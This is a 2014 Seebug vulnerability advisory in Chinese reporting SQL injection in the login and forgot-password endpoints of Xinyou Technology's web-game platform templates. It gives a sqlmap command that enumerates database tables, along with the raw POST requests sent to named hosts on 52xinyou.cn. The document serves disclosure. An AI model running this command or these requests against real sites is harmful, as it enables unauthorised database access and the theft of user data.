信游科技页游平台模板多处SQL注入漏洞

2014-01-14T00:00:00
ID SSV:95089
Type seebug
Reporter Root
Modified 2014-01-14T00:00:00

Description

简要描述:

信游科技各大模板多处SQL注入漏洞,所有模板,均存在相应漏洞

详细说明:

1.用户登录处未对用户名uid进行过滤,导致SQL注入 为避免影响,以测试站点为例:

<img src="https://images.seebug.org/upload/201401/14164413367a84469384f747ed6a6c70c2ba1078.jpg" alt="sqltest3.jpg" width="600" onerror="javascript:errimg(this);">

sqlmap.py -r "C:\1.txt" -p "uid" --tables

POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1 Host: xy003.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: */* Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://xy003.52xinyou.cn/index.html Content-Length: 28 Cookie: xinyoukeji=2055191 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache uid=test&pwd=12345&rem=false

<img src="https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg" alt="sqltest2.jpg" width="600" onerror="javascript:errimg(this);">

2.忘记密码处,用户账户同样存在这个问题

POST /api/webaction.ashx HTTP/1.1 Host: xy006.52xinyou.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://xy006.52xinyou.cn/user/findpass.html Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 152 posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4

<img src="https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg" alt="sqltest1.jpg" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201401/14163841cd102df159ac76d703ba95010b38ca5c.jpg" alt="sqltest2.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201401/141647586a80e4cab3365ec56b23b9a0276f87a3.jpg" alt="sqltest1.jpg" width="600" onerror="javascript:errimg(this);">